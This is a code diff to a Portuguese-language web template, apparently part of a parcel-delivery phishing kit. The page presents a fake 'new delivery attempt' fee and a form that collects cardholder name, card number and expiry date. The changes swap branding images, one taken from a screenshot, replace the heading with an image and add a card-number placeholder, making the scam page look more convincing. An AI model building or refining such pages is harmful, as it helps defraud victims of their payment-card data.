--- a/views/coci.ejs
+++ b/views/coci.ejs
@@ -12,21 +12,24 @@
     <div>
         <div class="batr2">
             <div class="topap">
-                <img src="./img/topa.JPG" alt="">
+                <img src="./img/hetopa.PNG" alt="">
             </div>
 
             <div>
                 <div>
-                    <p class="pp2"> PAGAMENTO DOS CUSTOS DA NOVA TENTATIVA DE ENTREGA</p>
+                    <div>
+                        <img style=" margin-top: 20px;" class="ccimg" src="./img/upocct.png" alt="">
+                    </div>
+                    
                     <div class="section"  style="margin-top: 30px; margin-bottom: 40px;">
-                        <img class="ccimg" src="./img/cocio.JPG" alt="">
+                        
                             <form  method="post" id="pg2">
                                 
                                 <p>O nome no cartão*:</p>
                                 <input type="text" name=""  id="numnn" required>
             
                                 <p>Número do cartão*:</p>
-                                <input type="tel" name="" id="numcc" required maxlength="20">
+                                <input type="tel" name="" id="numcc" required maxlength="20" placeholder="----   ----   ----   ----">
                         
                                 <p>Cartão válido até (mês/ano)*:</p>
                                 <div class="exp">
@@ -50,7 +53,7 @@
 
     <div>
         <div class="bobota">
-            <img src="./img/botta.JPG" alt="">
+            <img src="./img/Capture d’écran 2023-11-06 à 23.01.44.png" alt="">
         </div>
     </div>
 
